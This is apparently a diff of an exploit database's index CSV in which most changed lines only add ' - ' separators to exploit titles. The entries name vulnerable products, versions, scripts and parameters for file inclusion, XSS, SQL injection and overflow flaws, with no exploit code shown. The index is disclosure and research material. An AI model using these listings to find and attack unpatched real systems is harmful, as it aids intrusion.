root_path Parameter Remote File Inclusion",2006-09-19,Root3r_H3ll,php,webapps,0 28613,platforms/php/webapps/28613.txt,"RedBLoG 0.5 common.php root_path Parameter Remote File Inclusion",2006-09-19,Root3r_H3ll,php,webapps,0 -28614,platforms/php/webapps/28614.txt,"RedBLoG 0.5 admin/index.php root_path Parameter Remote File Inclusion",2006-09-19,Root3r_H3ll,php,webapps,0 -28615,platforms/asp/webapps/28615.txt,"DotNetNuke 4.0 HTML Injection",2006-09-17,"Secure Shapes",asp,webapps,0 -28616,platforms/php/webapps/28616.txt,"A.I-Pifou 1.8 Choix_langue.php Directory Traversal",2006-09-20,cdg393,php,webapps,0 +28614,platforms/php/webapps/28614.txt,"RedBLoG 0.5 - admin/index.php root_path Parameter Remote File Inclusion",2006-09-19,Root3r_H3ll,php,webapps,0 +28615,platforms/asp/webapps/28615.txt,"DotNetNuke 4.0 - HTML Injection",2006-09-17,"Secure Shapes",asp,webapps,0 +28616,platforms/php/webapps/28616.txt,"A.I-Pifou 1.8 - Choix_langue.php Directory Traversal",2006-09-20,cdg393,php,webapps,0 28617,platforms/php/webapps/28617.txt,"Grayscale BandSite CMS 1.1 help_news.php the_band Parameter XSS",2006-09-21,"HACKERS PAL",php,webapps,0 28618,platforms/php/webapps/28618.txt,"Grayscale BandSite CMS 1.1 help_merch.php the_band Parameter XSS",2006-09-21,"HACKERS PAL",php,webapps,0 28619,platforms/php/webapps/28619.txt,"Grayscale BandSite CMS 1.1 help_mp3.php max_file_size_purdy Parameter XSS",2006-09-21,"HACKERS PAL",php,webapps,0 -28620,platforms/php/webapps/28620.txt,"Grayscale BandSite CMS 1.1 sendemail.php message_text Parameter XSS",2006-09-21,"HACKERS PAL",php,webapps,0 +28620,platforms/php/webapps/28620.txt,"Grayscale BandSite CMS 1.1 - sendemail.php message_text Parameter XSS",2006-09-21,"HACKERS PAL",php,webapps,0 28621,platforms/php/webapps/28621.txt,"Grayscale BandSite CMS 1.1 header.php the_band Parameter XSS",2006-09-21,"HACKERS PAL",php,webapps,0 -28622,platforms/php/webapps/28622.txt,"Grayscale BandSite CMS 1.1 login_header.php the_band Parameter XSS",2006-09-21,"HACKERS PAL",php,webapps,0 +28622,platforms/php/webapps/28622.txt,"Grayscale BandSite CMS 1.1 - login_header.php the_band Parameter XSS",2006-09-21,"HACKERS PAL",php,webapps,0 28623,platforms/php/webapps/28623.txt,"Grayscale BandSite CMS 1.1 bio_content.php the_band Parameter XSS",2006-09-21,"HACKERS PAL",php,webapps,0 28624,platforms/php/webapps/28624.txt,"Grayscale BandSite CMS 1.1 gbook_content.php the_band Parameter XSS",2006-09-21,"HACKERS PAL",php,webapps,0 28625,platforms/php/webapps/28625.txt,"Grayscale BandSite CMS 1.1 interview_content.php the_band Parameter XSS",2006-09-21,"HACKERS PAL",php,webapps,0 @@ -25688,7 +25688,7 @@ id,file,description,date,author,platform,type,port 28638,platforms/php/webapps/28638.txt,"Grayscale BandSite CMS 1.1 footer.php this_year Parameter XSS",2006-09-21,"HACKERS PAL",php,webapps,0 28639,platforms/linux/remote/28639.rb,"Apple QuickTime 7.1.3 PlugIn - Arbitrary Script Execution Weakness",2006-09-21,LMH,linux,remote,0 28640,platforms/windows/remote/28640.txt,"CA eSCC r8/1.0_eTrust Audit r8/1.5 Web Server Path Disclosure",2006-09-21,"Patrick Webster",windows,remote,0 -28641,platforms/windows/remote/28641.txt,"CA eSCC r8/1.0_eTrust Audit r8/1.5 Unspecified Arbitrary File Manipulation",2006-09-21,"Patrick Webster",windows,remote,0 +28641,platforms/windows/remote/28641.txt,"CA eSCC r8/1.0_eTrust Audit r8/1.5 - Unspecified Arbitrary File Manipulation",2006-09-21,"Patrick Webster",windows,remote,0 28642,platforms/windows/remote/28642.txt,"CA eSCC r8/1.0_eTrust Audit r8/1.5 Audit Event System Unspecified Replay Attack",2006-09-21,"Patrick Webster",windows,remote,0 28643,platforms/osx/remote/28643.txt,"Apple Mac OS X 10.x - AirPort Wireless Driver Multiple Buffer Overflow Vulnerabilities",2006-09-21,"David Maynor",osx,remote,0 28644,platforms/php/webapps/28644.txt,"Google Mini Search Appliance 4.4.102.M.36 Information Disclosure",2006-09-22,"Patrick Webster",php,webapps,0 @@ -25705,13 +25705,13 @@ id,file,description,date,author,platform,type,port 28699,platforms/php/webapps/28699.txt,"CubeCart 3.0.x - /admin/print_order.php order_id Parameter XSS",2006-09-26,"HACKERS PAL",php,webapps,0 28652,platforms/hardware/webapps/28652.txt,"Asus RT-N66U 3.0.0.4.374_720 - CSRF",2013-09-30,cgcai,hardware,webapps,80 28653,platforms/linux/webapps/28653.txt,"mod_accounting Module 0.5 - Blind SQL Injection",2013-09-30,Wireghoul,linux,webapps,0 -28654,platforms/php/webapps/28654.txt,"XAMPP 1.8.1 (lang.php WriteIntoLocalDisk method) - Local Write Access",2013-09-30,"Manuel García Cárdenas",php,webapps,80 +28654,platforms/php/webapps/28654.txt,"XAMPP 1.8.1 - (lang.php WriteIntoLocalDisk method) Local Write Access",2013-09-30,"Manuel García Cárdenas",php,webapps,80 28655,platforms/multiple/local/28655.rb,"Nodejs js-yaml load() Code Exec",2013-09-30,Metasploit,multiple,local,0 28656,platforms/php/webapps/28656.txt,"SimpleRisk 20130915-01 - Multiple Vulnerabilities",2013-09-30,"Ryan Dewhurst",php,webapps,80 28657,platforms/linux/local/28657.c,"glibc and eglibc 2.5/2.7/2.13 - Buffer Overflow",2013-09-30,"Hector Marco and Ismael Ripoll",linux,local,0 28661,platforms/php/webapps/28661.txt,"ToendaCMS 1.0.4 Media.php Directory Traversal",2006-09-24,MoHaJaLi,php,webapps,0 -28662,platforms/php/webapps/28662.txt,"PhotoStore details.php - gid Parameter XSS",2006-09-25,meto5757,php,webapps,0 -28663,platforms/php/webapps/28663.txt,"PhotoStore view_photog.php - photogid Parameter XSS",2006-09-25,meto5757,php,webapps,0 +28662,platforms/php/webapps/28662.txt,"PhotoStore - details.php gid Parameter XSS",2006-09-25,meto5757,php,webapps,0 +28663,platforms/php/webapps/28663.txt,"PhotoStore - view_photog.php photogid Parameter XSS",2006-09-25,meto5757,php,webapps,0 28664,platforms/php/webapps/28664.txt,"Opial AV Download Management 1.0 - Index.php Cross-Site Scripting",2006-09-25,meto5757,php,webapps,0 28665,platforms/php/webapps/28665.txt,"WWWThreads 5.4 - Cat Parameter Multiple Cross-Site Scripting Vulnerabilities",2006-09-25,Root3r_H3ll,php,webapps,0 28666,platforms/multiple/dos/28666.txt,"Call of Duty Server 4.1.x - Callvote Map Command Remote Buffer Overflow",2006-09-25,"Luigi Auriemma",multiple,dos,0 @@ -25719,10 +25719,10 @@ id,file,description,date,author,platform,type,port 28668,platforms/php/webapps/28668.txt,"BirdBlog 1.x - index.php page Parameter XSS",2006-09-25,Root3r_H3ll,php,webapps,0 28669,platforms/php/webapps/28669.txt,"BirdBlog 1.x - user.php uid Parameter XSS",2006-09-25,Root3r_H3ll,php,webapps,0 28670,platforms/php/webapps/28670.txt,"DanPHPSupport 0.5 - index.php page Parameter XSS",2006-09-25,You_You,php,webapps,0 -28671,platforms/php/webapps/28671.txt,"DanPHPSupport 0.5 admin.php do Parameter XSS",2006-09-25,You_You,php,webapps,0 +28671,platforms/php/webapps/28671.txt,"DanPHPSupport 0.5 - admin.php do Parameter XSS",2006-09-25,You_You,php,webapps,0 28672,platforms/php/webapps/28672.pl,"BBSNew 2.0.1 Index2.php Remote File Inclusion",2006-09-25,Root3r_H3ll,php,webapps,0 28673,platforms/php/webapps/28673.txt,"Exporia 0.3 Common.php Remote File Inclusion",2006-09-25,Root3r_H3ll,php,webapps,0 -28674,platforms/php/webapps/28674.pl,"Back-End CMS 0.4.5 admin/index.php includes_path Parameter Remote File Inclusion",2006-09-25,Root3r_H3ll,php,webapps,0 +28674,platforms/php/webapps/28674.pl,"Back-End CMS 0.4.5 - admin/index.php includes_path Parameter Remote File Inclusion",2006-09-25,Root3r_H3ll,php,webapps,0 28675,platforms/php/webapps/28675.txt,"Back-End CMS 0.4.5 Facts.php includes_path Parameter Remote File Inclusion",2006-09-25,Root3r_H3ll,php,webapps,0 28676,platforms/php/webapps/28676.txt,"Back-End CMS 0.4.5 - search.php includes_path Parameter Remote File Inclusion",2006-09-25,Root3r_H3ll,php,webapps,0 28725,platforms/multiple/remote/28725.txt,"SAP Internet Transaction Server 6.10/6.20 - Cross-Site Scripting",2006-09-28,"ILION Research",multiple,remote,0 @@ -25730,7 +25730,7 @@ id,file,description,date,author,platform,type,port 28679,platforms/multiple/dos/28679.txt,"Evince PDF Reader 2.32.0.145 (Windows) / 3.4.0 (Linux) - Denial of Service",2013-10-02,Deva,multiple,dos,0 28680,platforms/linux/local/28680.txt,"PinApp Mail-SeCure 3.70 - Access Control Failure",2013-10-02,"Core Security",linux,local,0 28681,platforms/windows/remote/28681.rb,"freeFTPd PASS Command Buffer Overflow",2013-10-02,Metasploit,windows,remote,21 -28682,platforms/windows/remote/28682.rb,"Micorosft Internet Explorer SetMouseCapture Use-After-Free",2013-10-02,Metasploit,windows,remote,0 +28682,platforms/windows/remote/28682.rb,"Micorosft Internet Explorer - SetMouseCapture Use-After-Free",2013-10-02,Metasploit,windows,remote,0 28683,platforms/linux/dos/28683.txt,"HylaFAX+ 5.2.4 > 5.5.3 - Buffer Overflow",2013-10-02,"Dennis Jenkins",linux,dos,0 28684,platforms/php/webapps/28684.txt,"Gnew 2013.1 - Multiple Vulnerabilities (2)",2013-10-02,"High-Tech Bridge SA",php,webapps,80 28685,platforms/php/webapps/28685.txt,"GLPI 0.84.1 - Multiple Vulnerabilities",2013-10-02,"High-Tech Bridge SA",php,webapps,0 @@ -25755,7 +25755,7 @@ id,file,description,date,author,platform,type,port 28734,platforms/php/webapps/28734.txt,"Yblog uss.php action Parameter XSS",2006-09-30,You_You,php,webapps,0 28735,platforms/windows/dos/28735.pl,"MailEnable 2.x - SMTP NTLM Authentication - Multiple Vulnerabilities",2006-11-29,mu-b,windows,dos,0 29275,platforms/cgi/webapps/29275.txt,"Netwin SurgeFTP 2.3a1 SurgeFTPMGR.CGI Multiple Input Validation Vulnerabilities",2006-12-11,"Umesh Wanve",cgi,webapps,0 -29276,platforms/asp/webapps/29276.txt,"Lotfian Request For Travel 1.0 ProductDetails.ASP SQL Injection",2006-12-11,ajann,asp,webapps,0 +29276,platforms/asp/webapps/29276.txt,"Lotfian Request For Travel 1.0 - ProductDetails.ASP SQL Injection",2006-12-11,ajann,asp,webapps,0 28728,platforms/php/webapps/28728.txt,"Geotarget Script.php Remote File Inclusion",2006-09-29,"RaVeR shi mozi",php,webapps,0 28708,platforms/php/webapps/28708.txt,"elproLOG MONITOR WebAccess 2.1 - Multiple Vulnerabilities",2013-10-04,Vulnerability-Lab,php,webapps,80 28709,platforms/php/webapps/28709.txt,"FlashChat 6.0.2-6.0.8 - Arbitrary File Upload",2013-10-04,x-hayben21,php,webapps,80 @@ -25763,7 +25763,7 @@ id,file,description,date,author,platform,type,port 28711,platforms/php/webapps/28711.txt,"PHP Invoice 2.2 Home.php Cross-Site Scripting",2006-09-26,meto5757,php,webapps,0 28712,platforms/php/webapps/28712.txt,"CMS Formulasi 2.07 - Multiple Vulnerabilities",2013-10-04,"Sarahma Security",php,webapps,80 28713,platforms/php/remote/28713.php,"Apache Tomcat/JBoss EJBInvokerServlet / JMXInvokerServlet (RMI over HTTP) Marshalled Object RCE",2013-10-04,rgod,php,remote,0 -28714,platforms/php/webapps/28714.txt,"PHPSelect Web Development Index.php3 - Remote File Inclusion",2006-09-27,rUnViRuS,php,webapps,0 +28714,platforms/php/webapps/28714.txt,"PHPSelect Web Development - Index.php3 Remote File Inclusion",2006-09-27,rUnViRuS,php,webapps,0 29274,platforms/php/webapps/29274.html,"Horde Groupware Web Mail Edition 5.1.2 - CSRF (1)",2013-10-29,"Marcela Benetrix",php,webapps,80 28716,platforms/php/webapps/28716.txt,"MKPortal 1.0/1.1 PMPopup.php Cross-Site Scripting",2006-09-27,HanowarS,php,webapps,0 29279,platforms/php/webapps/29279.txt,"Olat CMS 7.8.0.1 - Persistent XSS",2013-10-29,Vulnerability-Lab,php,webapps,0 @@ -25781,20 +25781,20 @@ id,file,description,date,author,platform,type,port 28740,platforms/php/webapps/28740.txt,"HAMweather 3.9.8 Template.php Script Code Injection",2006-10-03,"James Bercegay",php,webapps,0 28741,platforms/php/webapps/28741.txt,"Yener Haber Script 1.0/2.0 - SQL Injection",2006-10-04,Dj_ReMix,php,webapps,0 28742,platforms/asp/webapps/28742.txt,"ASPPlayGround.NET Forum 2.4.5 Calendar.ASP Cross-Site Scripting",2006-10-27,MizoZ,asp,webapps,0 -28743,platforms/php/webapps/28743.txt,"osCommerce 2.2 admin/banner_manager.php page Parameter XSS",2006-10-04,Lostmon,php,webapps,0 -28744,platforms/php/webapps/28744.txt,"osCommerce 2.2 admin/banner_statistics.php page Parameter XSS",2006-10-04,Lostmon,php,webapps,0 +28743,platforms/php/webapps/28743.txt,"osCommerce 2.2 - admin/banner_manager.php page Parameter XSS",2006-10-04,Lostmon,php,webapps,0 +28744,platforms/php/webapps/28744.txt,"osCommerce 2.2 - admin/banner_statistics.php page Parameter XSS",2006-10-04,Lostmon,php,webapps,0 28745,platforms/php/webapps/28745.txt,"osCommerce 2.2 - admin/countries.php page Parameter XSS",2006-10-04,Lostmon,php,webapps,0 28746,platforms/php/webapps/28746.txt,"osCommerce 2.2 - admin/currencies.php page Parameter XSS",2006-10-04,Lostmon,php,webapps,0 -28747,platforms/php/webapps/28747.txt,"osCommerce 2.2 admin/languages.php page Parameter XSS",2006-10-04,Lostmon,php,webapps,0 -28748,platforms/php/webapps/28748.txt,"osCommerce 2.2 admin/manufacturers.php page Parameter XSS",2006-10-04,Lostmon,php,webapps,0 -28752,platforms/php/webapps/28752.txt,"osCommerce 2.2 admin/products_expected.php page Parameter XSS",2006-10-04,Lostmon,php,webapps,0 -28753,platforms/php/webapps/28753.txt,"osCommerce 2.2 admin/reviews.php page Parameter XSS",2006-10-04,Lostmon,php,webapps,0 -28754,platforms/php/webapps/28754.txt,"osCommerce 2.2 admin/specials.php page Parameter XSS",2006-10-04,Lostmon,php,webapps,0 -28755,platforms/php/webapps/28755.txt,"osCommerce 2.2 admin/stats_products_purchased.php page Parameter XSS",2006-10-04,Lostmon,php,webapps,0 -28756,platforms/php/webapps/28756.txt,"osCommerce 2.2 admin/stats_products_viewed.php page Parameter XSS",2006-10-04,Lostmon,php,webapps,0 -28757,platforms/php/webapps/28757.txt,"osCommerce 2.2 admin/tax_classes.php page Parameter XSS",2006-10-04,Lostmon,php,webapps,0 -28758,platforms/php/webapps/28758.txt,"osCommerce 2.2 admin/tax_rates.php page Parameter XSS",2006-10-04,Lostmon,php,webapps,0 -28759,platforms/php/webapps/28759.txt,"osCommerce 2.2 admin/zones.php page Parameter XSS",2006-10-04,Lostmon,php,webapps,0 +28747,platforms/php/webapps/28747.txt,"osCommerce 2.2 - admin/languages.php page Parameter XSS",2006-10-04,Lostmon,php,webapps,0 +28748,platforms/php/webapps/28748.txt,"osCommerce 2.2 - admin/manufacturers.php page Parameter XSS",2006-10-04,Lostmon,php,webapps,0 +28752,platforms/php/webapps/28752.txt,"osCommerce 2.2 - admin/products_expected.php page Parameter XSS",2006-10-04,Lostmon,php,webapps,0 +28753,platforms/php/webapps/28753.txt,"osCommerce 2.2 - admin/reviews.php page Parameter XSS",2006-10-04,Lostmon,php,webapps,0 +28754,platforms/php/webapps/28754.txt,"osCommerce 2.2 - admin/specials.php page Parameter XSS",2006-10-04,Lostmon,php,webapps,0 +28755,platforms/php/webapps/28755.txt,"osCommerce 2.2 - admin/stats_products_purchased.php page Parameter XSS",2006-10-04,Lostmon,php,webapps,0 +28756,platforms/php/webapps/28756.txt,"osCommerce 2.2 - admin/stats_products_viewed.php page Parameter XSS",2006-10-04,Lostmon,php,webapps,0 +28757,platforms/php/webapps/28757.txt,"osCommerce 2.2 - admin/tax_classes.php page Parameter XSS",2006-10-04,Lostmon,php,webapps,0 +28758,platforms/php/webapps/28758.txt,"osCommerce 2.2 - admin/tax_rates.php page Parameter XSS",2006-10-04,Lostmon,php,webapps,0 +28759,platforms/php/webapps/28759.txt,"osCommerce 2.2 - admin/zones.php page Parameter XSS",2006-10-04,Lostmon,php,webapps,0 28760,platforms/php/remote/28760.php,"PHP 3-5 ZendEngine ECalloc Integer Overflow",2006-10-05,anonymous,php,remote,0 28761,platforms/php/webapps/28761.txt,"WikyBlog 1.2.x - Index.php Remote File Inclusion",2006-10-05,MoHaNdKo,php,webapps,0 28762,platforms/asp/webapps/28762.txt,"Civica Display.ASP SQL Injection",2006-10-05,CodeXpLoder'tq,asp,webapps,0 @@ -25830,7 +25830,7 @@ id,file,description,date,author,platform,type,port 28792,platforms/php/webapps/28792.txt,"MamboLaiThai ExtCalThai 0.9.1 - admin_events.php CONFIG_EXT[LANGUAGES_DIR] Parameter Remote File Inclusion",2006-10-12,k1tk4t,php,webapps,0 28793,platforms/php/webapps/28793.txt,"MamboLaiThai ExtCalThai 0.9.1 - mail.inc.php CONFIG_EXT[LIB_DIR] Parameter Remote File Inclusion",2006-10-12,k1tk4t,php,webapps,0 28794,platforms/php/webapps/28794.txt,"4Images 1.7 - Details.php Cross-Site Scripting",2006-10-12,"Christian Marthen",php,webapps,0 -28795,platforms/php/webapps/28795.php,"FreeWPS 2.11 Upload.php Remote Command Execution",2006-10-12,"HACKERS PAL",php,webapps,0 +28795,platforms/php/webapps/28795.php,"FreeWPS 2.11 - Upload.php Remote Command Execution",2006-10-12,"HACKERS PAL",php,webapps,0 28796,platforms/php/webapps/28796.pl,"Buzlas 2006-1 Full Archive_Topic.php Remote File Inclusion",2006-09-29,"Nima Salehi",php,webapps,0 28797,platforms/php/webapps/28797.txt,"Bloq 0.5.4 - index.php page[path] Parameter Remote File Inclusion",2006-10-13,KorsaN,php,webapps,0 28798,platforms/php/webapps/28798.txt,"Bloq 0.5.4 - admin.php page[path] Parameter Remote File Inclusion",2006-10-13,KorsaN,php,webapps,0 @@ -25847,14 +25847,14 @@ id,file,description,date,author,platform,type,port 28808,platforms/php/webapps/28808.txt,"WordPress Quick Contact Form Plugin 6.0 - Persistent XSS",2013-10-08,Zy0d0x,php,webapps,0 28809,platforms/windows/remote/28809.rb,"HP LoadRunner magentproc.exe Overflow",2013-10-08,Metasploit,windows,remote,443 28810,platforms/unix/remote/28810.rb,"GestioIP Remote Command Execution",2013-10-08,Metasploit,unix,remote,0 -28811,platforms/osx/dos/28811.txt,"Apple Motion 5.0.7 Integer Overflow",2013-10-08,"Jean Pascal Pereira",osx,dos,0 +28811,platforms/osx/dos/28811.txt,"Apple Motion 5.0.7 - Integer Overflow",2013-10-08,"Jean Pascal Pereira",osx,dos,0 28812,platforms/freebsd/dos/28812.c,"FreeBSD 5.5/6.x - Scheduler Policy Local Denial of Service",2006-10-13,"Diane Bruce",freebsd,dos,0 28813,platforms/freebsd/dos/28813.c,"FreeBSD 6.0/6.1 Ftrucante Local Denial of Service",2006-10-13,"Kirk Russell",freebsd,dos,0 28814,platforms/php/webapps/28814.txt,"RamaCMS ADODB.Inc.php Remote File Inclusion",2006-10-13,"Le CoPrA",php,webapps,0 28815,platforms/php/webapps/28815.txt,"H-Sphere 2.x - WebShell Login.php Cross-Site Scripting",2006-10-14,b0rizQ,php,webapps,0 28816,platforms/linux/dos/28816.txt,"KMail 1.x - HTML Element Handling Denial of Service",2006-10-16,nnp,linux,dos,0 28817,platforms/multiple/local/28817.txt,"Internet Security Systems 3.6 = ZWDeleteFile Function Arbitrary File Deletion",2006-10-16,"Matousec Transparent security",multiple,local,0 -28818,platforms/php/webapps/28818.txt,"Mambo MostlyCE 4.5.4 HTMLTemplate.php Remote File Inclusion",2006-10-16,The_BeKiR,php,webapps,0 +28818,platforms/php/webapps/28818.txt,"Mambo MostlyCE 4.5.4 - HTMLTemplate.php Remote File Inclusion",2006-10-16,The_BeKiR,php,webapps,0 28819,platforms/php/webapps/28819.txt,"Lodel CMS 0.7.3 Calcul-Page.php Remote File Inclusion",2006-10-17,The_BeKiR,php,webapps,0 28820,platforms/php/webapps/28820.txt,"Webgenius Goop Gallery 2.0 - Index.php Cross-Site Scripting",2006-10-17,Lostmon,php,webapps,0 28821,platforms/php/webapps/28821.txt,"Maintain 3.0.0-RC2 Example6.php Remote File Inclusion",2006-10-16,ERNE,php,webapps,0 @@ -25896,18 +25896,18 @@ id,file,description,date,author,platform,type,port 28858,platforms/php/webapps/28858.txt,"Simpnews 2.x - admin/index.php Unspecified XSS",2006-10-24,security@vigilon.com,php,webapps,0 28859,platforms/php/webapps/28859.txt,"Simpnews 2.x - admin/pwlost.php Unspecified XSS",2006-10-24,security@vigilon.com,php,webapps,0 28860,platforms/windows/dos/28860.c,"FtpXQ Server 3.01 MKD Command Remote Overflow DoS",2006-10-24,"Federico Fazzi",windows,dos,0 -28861,platforms/php/webapps/28861.txt,"Comment IT 0.2 PathToComment Parameter Remote File Inclusion",2006-10-25,"Cold Zero",php,webapps,0 +28861,platforms/php/webapps/28861.txt,"Comment IT 0.2 - PathToComment Parameter Remote File Inclusion",2006-10-25,"Cold Zero",php,webapps,0 28862,platforms/php/webapps/28862.txt,"PHPMyConferences 8.0.2 Init.php Remote File Inclusion",2006-10-25,The-0utl4w,php,webapps,0 -28863,platforms/php/webapps/28863.txt,"MAXdev MD-Pro 1.0.76 User.php Cross-Site Scripting",2006-10-26,r00t,php,webapps,0 +28863,platforms/php/webapps/28863.txt,"MAXdev MD-Pro 1.0.76 - User.php Cross-Site Scripting",2006-10-26,r00t,php,webapps,0 28864,platforms/php/webapps/28864.txt,"PhpLeague 0.81 consult/miniseul.php cheminmini Parameter Remote File Inclusion",2006-10-26,ajaan,php,webapps,0 28865,platforms/php/webapps/28865.txt,"PHPTreeView 1.0 - TreeViewClass.php Remote File Inclusion",2006-10-27,"Prince Islam",php,webapps,0 -28866,platforms/php/webapps/28866.txt,"IG Shop 1.4 Change_Pass.php Cross-Site Scripting",2006-10-30,SnipEr.X,php,webapps,0 +28866,platforms/php/webapps/28866.txt,"IG Shop 1.4 - Change_Pass.php Cross-Site Scripting",2006-10-30,SnipEr.X,php,webapps,0 28867,platforms/php/webapps/28867.txt,"TorrentFlux 2.1 Dir.php Directory Traversal",2006-10-27,Christopher,php,webapps,0 28868,platforms/php/webapps/28868.txt,"PLS-Bannieres 1.21 Bannieres.php Remote File Inclusion",2006-10-27,Mahmood_ali,php,webapps,0 28869,platforms/asp/webapps/28869.txt,"Web Wiz Forum 6.34/7.x - Search.ASP SQL Injection",2006-10-28,almaster,asp,webapps,0 28870,platforms/php/webapps/28870.txt,"PunBB 1.x - SQL Injection",2006-10-30,nmsh_sa,php,webapps,0 -28871,platforms/php/webapps/28871.txt,"Actionpoll 1.1.1 db/DataReaderWriter.php CONFIG_DB Parameter Remote File Inclusion",2006-10-30,"Cyber Security",php,webapps,0 -28872,platforms/php/webapps/28872.txt,"Actionpoll 1.1.1 db/PollDB.php CONFIG_DATAREADERWRITER Parameter Remote File Inclusion",2006-10-30,"Cyber Security",php,webapps,0 +28871,platforms/php/webapps/28871.txt,"Actionpoll 1.1.1 - db/DataReaderWriter.php CONFIG_DB Parameter Remote File Inclusion",2006-10-30,"Cyber Security",php,webapps,0 +28872,platforms/php/webapps/28872.txt,"Actionpoll 1.1.1 - db/PollDB.php CONFIG_DATAREADERWRITER Parameter Remote File Inclusion",2006-10-30,"Cyber Security",php,webapps,0 28873,platforms/php/webapps/28873.txt,"Exhibit Engine 1.22 fetchsettings.php toroot Parameter Remote File Inclusion",2006-10-30,"Cyber Security",php,webapps,0 28874,platforms/php/webapps/28874.txt,"Exhibit Engine 1.22 fstyles.php toroot Parameter Remote File Inclusion",2006-10-30,"Cyber Security",php,webapps,0 28875,platforms/php/webapps/28875.txt,"Freenews 1.1 Aff_News.php Remote File Inclusion",2006-10-30,MoHaNdKo,php,webapps,0 @@ -25938,16 +25938,16 @@ id,file,description,date,author,platform,type,port 28900,platforms/php/webapps/28900.txt,"ac4p Mobile - index.php Multiple Parameter XSS",2006-11-03,AL-garnei,php,webapps,0 28901,platforms/php/webapps/28901.txt,"ac4p Mobile - MobileNews.php Multiple Parameter XSS",2006-11-03,AL-garnei,php,webapps,0 28902,platforms/php/webapps/28902.txt,"ac4p Mobile - polls.php Multiple Parameter XSS (1)",2006-11-03,AL-garnei,php,webapps,0 -28903,platforms/php/webapps/28903.txt,"ac4p Mobile send.php cats Parameter XSS",2006-11-03,AL-garnei,php,webapps,0 +28903,platforms/php/webapps/28903.txt,"ac4p Mobile - send.php cats Parameter XSS",2006-11-03,AL-garnei,php,webapps,0 28904,platforms/php/webapps/28904.txt,"ac4p Mobile - up.php Multiple Parameter XSS",2006-11-03,AL-garnei,php,webapps,0 -28905,platforms/php/webapps/28905.txt,"ac4p Mobile cp/index.php pagenav Parameter XSS",2006-11-03,AL-garnei,php,webapps,0 +28905,platforms/php/webapps/28905.txt,"ac4p Mobile - cp/index.php pagenav Parameter XSS",2006-11-03,AL-garnei,php,webapps,0 28906,platforms/php/webapps/28906.txt,"Simplog 0.9.3 BlogID Parameter - Multiple SQL Injection",2006-11-03,"Benjamin Moss",php,webapps,0 28907,platforms/php/webapps/28907.txt,"Simplog 0.9.3 Archive.php PID Parameter Cross-Site Scripting",2006-11-03,"Benjamin Moss",php,webapps,0 -28908,platforms/php/webapps/28908.txt,"Advanced GuestBook 2.3.1 Admin.php Remote File Inclusion",2006-11-03,BrokeN-ProXy,php,webapps,0 +28908,platforms/php/webapps/28908.txt,"Advanced GuestBook 2.3.1 - Admin.php Remote File Inclusion",2006-11-03,BrokeN-ProXy,php,webapps,0 28909,platforms/php/webapps/28909.txt,"IF-CMS Index.php Cross-Site Scripting",2006-11-04,"Benjamin Moss",php,webapps,0 28910,platforms/php/webapps/28910.pl,"PHPKit 1.6.1 Popup.php SQL Injection",2006-11-04,x23,php,webapps,0 28911,platforms/solaris/dos/28911.txt,"Sun Solaris 10 UFS Local Denial of Service",2006-11-04,LMH,solaris,dos,0 -28913,platforms/php/webapps/28913.txt,"@cid Stats 2.3 Install.php3 - Remote File Inclusion",2006-11-06,Mahmood_ali,php,webapps,0 +28913,platforms/php/webapps/28913.txt,"@cid Stats 2.3 - Install.php3 Remote File Inclusion",2006-11-06,Mahmood_ali,php,webapps,0 28914,platforms/php/webapps/28914.txt,"Xoops 2.0.5 NewList.php Cross-Site Scripting",2006-11-06,CvIr.System,php,webapps,0 28915,platforms/php/webapps/28915.txt,"Article Script 1.6.3 RSS.php SQL Injection",2006-11-06,Liz0ziM,php,webapps,0 28916,platforms/windows/remote/28916.rb,"America Online ICQ 5.1 - ActiveX Control Remote Code Execution",2006-11-06,"Peter Vreugdenhil",windows,remote,0 @@ -25975,7 +25975,7 @@ id,file,description,date,author,platform,type,port 28937,platforms/php/webapps/28937.txt,"AIOCP 1.3.x - cp_show_page_help.php Path Disclosure",2006-11-06,"laurent gaffie",php,webapps,0 28938,platforms/php/webapps/28938.txt,"IPManager 2.3 - Index.php Cross-Site Scripting",2006-11-07,spaceballyopsolo,php,webapps,0 28939,platforms/php/webapps/28939.txt,"Kayako SupportSuite 3.0.32 - Index.php Cross-Site Scripting",2006-11-07,Dr.HAiL,php,webapps,0 -28940,platforms/php/webapps/28940.txt,"PHPMyChat 0.14/0.15 Languages.Lib.php Local File Inclusion",2006-11-08,ajann,php,webapps,0 +28940,platforms/php/webapps/28940.txt,"PHPMyChat 0.14/0.15 - Languages.Lib.php Local File Inclusion",2006-11-08,ajann,php,webapps,0 28941,platforms/asp/webapps/28941.txt,"Immediacy .NET CMS 5.2 Logon.ASPX Cross-Site Scripting",2006-11-08,"Gemma Hughes",asp,webapps,0 28942,platforms/php/webapps/28942.txt,"FreeWebshop 2.1/2.2 - index.php page Parameter Traversal Arbitrary File Access",2006-11-08,"laurent gaffie",php,webapps,0 28943,platforms/php/webapps/28943.txt,"FreeWebshop 2.1/2.2 - index.php cat Parameter XSS",2006-11-08,"laurent gaffie",php,webapps,0 @@ -25995,7 +25995,7 @@ id,file,description,date,author,platform,type,port 28957,platforms/android/dos/28957.txt,"Android Zygote - Socket and Fork bomb Attack",2013-10-14,"Luca Verderame",android,dos,0 28959,platforms/php/webapps/28959.txt,"WordPress Cart66 Plugin 1.5.1.14 - Multiple Vulnerabilities",2013-10-14,absane,php,webapps,80 28960,platforms/php/webapps/28960.py,"aMSN 0.98.9 Web App - Multiple Vulnerabilities",2013-10-14,drone,php,webapps,80 -29086,platforms/asp/webapps/29086.txt,"ActiveNews Manager activenews_view.asp articleID Parameter SQL Injection",2006-11-18,"laurent gaffie",asp,webapps,0 +29086,platforms/asp/webapps/29086.txt,"ActiveNews Manager - activenews_view.asp articleID Parameter SQL Injection",2006-11-18,"laurent gaffie",asp,webapps,0 28962,platforms/multiple/remote/28962.rb,"VMware Hyperic HQ Groovy Script-Console Java Execution",2013-10-14,Metasploit,multiple,remote,0 28963,platforms/php/webapps/28963.txt,"Bitweaver 1.x - fisheye/index.php sort_mode Parameter SQL Injection",2006-11-10,"laurent gaffie",php,webapps,0 28964,platforms/php/webapps/28964.txt,"Bitweaver 1.x - wiki/orphan_pages.php sort_mode Parameter SQL Injection",2006-11-10,"laurent gaffie",php,webapps,0 @@ -26005,7 +26005,7 @@ id,file,description,date,author,platform,type,port 28968,platforms/windows/remote/28968.html,"Aladdin Knowledge Systems Ltd. PrivAgent ActiveX Control Overflow",2013-10-15,blake,windows,remote,0 28969,platforms/windows/local/28969.py,"Beetel Connection Manager PCW_BTLINDV1.0.0B04 - SEH Buffer Overflow",2013-10-15,metacom,windows,local,0 